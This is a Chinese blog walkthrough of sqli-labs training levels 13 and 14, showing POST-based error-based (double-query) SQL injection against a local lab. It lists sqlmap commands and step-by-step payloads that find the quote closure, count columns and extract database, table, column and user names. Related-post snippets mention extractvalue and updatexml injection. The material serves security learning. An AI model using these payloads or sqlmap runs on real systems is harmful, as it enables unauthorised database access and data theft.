sqli-labs靶场13-14关(基于POST双查询)

最新推荐文章于 2024-05-06 10:38:20 发布
最新推荐文章于 2024-05-06 10:38:20 发布
阅读量622 收藏 2
点赞数 1
分类专栏: sqli-labs靶场 文章标签: php mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46527080/article/details/111087150
版权

sqlmap方法

python2 sqlmap.py -u http://127.0.0.1/sqlilabs/Less-13/index.php?id=1 --data "uname=')or('1')=('1 &passwd=')or('1')=('1&submit=Submit" --dbs --threads 10 --batch --technique EBS

第十三关

源码分析
在这里插入图片描述可以看到闭合字符为(‘’)
再查看输出的语句,可以判断出如果语句报错会输出一些东西,所以这一关是基于POST双查询注入
在这里插入图片描述开始干
一、判断注入点
1.寻找闭合字符(并注释)

uname=admin&passwd=adm'&submit=Submit

在这里插入图片描述发现单引号报错了,注释一下试试

uname=admin&passwd=adm' and 1=1 --+&submit=Submit

设为恒为真发现还是报错,所以这个闭合字符是基于’上再加字符

uname=admin&passwd=adm' ) and 1=1 --+&submit=Submit

发现不报错了,然后闭合字符就是(‘’)
在这里插入图片描述二、判断列数

uname=admin&passwd=adm' ) order by 2 --+&submit=Submit(没报错)
uname=admin&passwd=adm' ) order by 3 --+&submit=Submit (报错)

在这里插入图片描述三、构造payload
1.首先构造一个简单的双查询(方便以后往里面插数据)

uname=admin&passwd=adm' ) union select 1,2 --+&submit=Submit

在这里插入图片描述2.构造双查询的payload并依次爆出库,表,字段,数据
爆库

uname=admin &passwd=') union select count(*),concat((select schema_name from information_schema.schemata limit 6,1),(floor(rand()*2))) as a from information_schema.tables group by a#&submit=Submit

在这里插入图片描述爆版本号

uname= a') union select count(*),concat(0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2)) as a from information_schema.tables group by a # &passwd=&submit=Submit

在这里插入图片描述爆表名

uname=admin &passwd=') union select count(*),concat(( select table_name from information_schema.tables where table_schema="security" limit 3,1),(floor(rand()*2))) as a from information_schema.tables group by a#&submit=Submit

在这里插入图片描述爆字段名

uname=admin &passwd=') union select count(*),concat(( select column_name from information_schema.columns where table_name="users" limit 1,1),(floor(rand()*2))) as a from information_schema.columns group by a#&submit=Submit

在这里插入图片描述爆数据

uname=admin &passwd=') union select count(*),concat(( select username from users limit 1,1),(floor(rand()*2))) as a from information_schema.columns group by a#&submit=Submit

在这里插入图片描述结束

第十四关

源码分析
在这里插入图片描述发现只有被双引号包裹
直接判断注入点
其他和13关一样

uname=admin" and 1=1--+&passwd=&submit=Submit

在这里插入图片描述

sqlmap方法

python2 sqlmap.py -u "http://127.0.0.1/sqlilabs/Less-14/index.php?id=1" --data "uname=1&passwd=1&submit=Submit" --dbs --threads 8 --technique E --dbms mysql

24team
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql二次注入-sqli-labs第13
weixin_46784800的博客
11-04 949
获取数据操作 判断所查询数据库中包含的列数 采用post进行参数输入: uname=') order by 3 -- - &passwd=') -- - 通过对查询结果进行排序,发现无法对第三列进行排序,且报错Unknown column ‘3’ in ‘order clause’,则说明所查询数据库中共有两列数据。 判断输出数据与数据库的联系 输入语句 uname=') or 1=1 -- - &passwd=') -- - 可发现界面只有登录成功的提示,则说明该网站为盲注,则
sqli-labs-master第1314
m_ing
05-13 1177
前言:输入内容被放到引号中,报错型注入,注释符不可用 第十三: http://192.168.89.134/sqli-labs-master/Less-13/ 先输入:admin’) 我们还是分析一下: 我们接着用and来测试。 admin’) and 1=2# -admin’) union selec 1,2#联合查询 还是没有报错,那我们就用报错语句来测试吧,这次我使用extractvalue() 显示版本,数据库 admin’) and extractvalue(1,concat(0x7
SQLI-labs-第十三和第十四
weixin_54055099的博客
05-06 487
Sqlilabs的第十三和第十四,报错注入
sqli-labs第十三
yuqnqi的博客
05-09 433
第二个参数: xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想要查询的内容。tip: 还有要注意的地方是,它能够查询的字符串长度最大是32个字符,如果超过32位,我们就需要用函数来查询,比如right(),left(),substr()来截取字符串。构造语句,先用 ') 进行闭合,判断列数是多少,持续增加列数,直到返回正确的结果。判断注入点的闭合方式。
sqli-labs靶场第十四
gou1791241251的博客
12-27 515
由图可知,闭合方式为引号 尝试布尔盲注一下数据库名 登录成功! 报错注入也是可以的哦!
sqli-labs通(十三)
qq_65950075的博客
05-03 619
报错原理:xml文档中查找字符位置是用/xxx/xxx/xxx/...这种格式,如果写入其他格式就会报错,并且会返回写入的非法格式内容,错误信息如:XPATH syntax error:'xxxxxxxx‘没有任何的返回信息,只有报错信息,那我们就用报错注入,让返回的报错信息包含我们的想要的信息。0x7e是~的意思,用concat拼接我们的sql语句,不符合xml文档的格式,就会报错,参数2:XPath_string(Xpath格式的字符串),注入时可操作的地方。作用:改变文档中符合条件的节点的值。
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
sqli-labs靶场
最新发布
05-30
"sqli-labs靶场"是一个专门用于学习和测试SQL注入技术的平台,它提供了多种不同类型的SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
Sqli-labs靶场13详解[Sqli-labs-less-13]
m0_73615178的博客
03-02 621
所以,payload分析输入一个username值然后使用单引号加小括号 ') 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。整条语句使用单引号加小括号 ") 闭合。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。当值为3时报错显示,所以列数为2,但是没有显示位,所以尝试报错注入。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。
2020.4.4 sqli-labs--第十三、十四
DSR446的博客
04-04 351
Less-13 POST - Double Injection - Single quotes- String -twist (POST单引号变形注入) 方法一 通过报错可知 是通过’) 闭合的 发现没有登入成功返回信息 ,看来是要盲注了 万能密码: 账号admin’)# 密码:随便 方法二: 既然它返回错误信息了,说明有回显,可以报错注入。 数据库名 uname=admin') and e...
sqli-labs第十三和十四(post请求-报错盲注)
qq_42266432的博客
08-24 654
一上来,先加个单引号探探路,有sql报错回显 在单引号后继续加上and 1,试图让sql报错显示更多信息,从near ‘’) and password=(‘1’) LIMIT 0,1’ at line 1可以判断,这就用单引号加括号了,没什么意思 注入’)却发现,页面没有回显,于是这里考虑使用报错盲注或者布尔盲注,时间延时说不定也行,先采用报错盲注吧 先使用order by 拆解出字段数为2 爆出当前数据库 uname=uname=1') and 1 union select 1,updatex.
sqli-labs第十三十四
m0_73248913的博客
02-08 119
sqli-labs第十三十四
sqli-labs(less-13)
筱阳的博客
06-08 922
由less-12 可知  通过报错可知  是通过') 闭合的发现没有登入成功返回信息 ...看来是要盲注了...操作就像GET注入一样  只需要改union select 1,2 的信息即可盲注只能考虑sqlmap了......
SQLi LABS Less-13 报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-21 1万+
SQLi 第十三SQLi-LABS Less-13SQLi-LABS Less 13SQLiLABS Less13SQLi Less 13
sql注入第十四------延时注入和布尔盲注
qq_45751902的博客
03-15 3226
闭合符号 465" or 1=1# 列数 465" order by 2# 465" order by 3# 所以确定有两列,但是没有回显,尝试延时注入 数据库名 " or if(length(database())>8,sleep(2),1)# " or if(length(database())>7,sleep(2),1)# 不知道为什么这个时间远远大于2秒,但是可以判断出数据库名的字符串长度为8,接下来就和第九和第十类似了,判断每个字符的ascii码,然后再asci
sqli-lab代码审计
weixin_44174581的博客
09-06 3268
导入Seay并自动审计,一个一个进行查看 第一个: 这是一个文件写入的代码段,意思是将接收到的GET请求参数id的值拼接起来写入result.txt文件中,就是一个id的历史记录文件。因为没有对id参数进行过滤,所以认为有文件写入漏洞,但是写入的是txt文件,就只是写入,不进行解析操作,所以还需要配合文件上传,上传一个.htaccess文件,将result.txt文件当作php脚本进行解析,这样就可以写入一句话木马了,但是没有文件上传漏洞,所以第一个没什么用。 第二个: 第二个就是第十SQL注入漏
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2到24SQL注入学习内容,适合初学者参考,涉及单引号、引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入的学习过程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值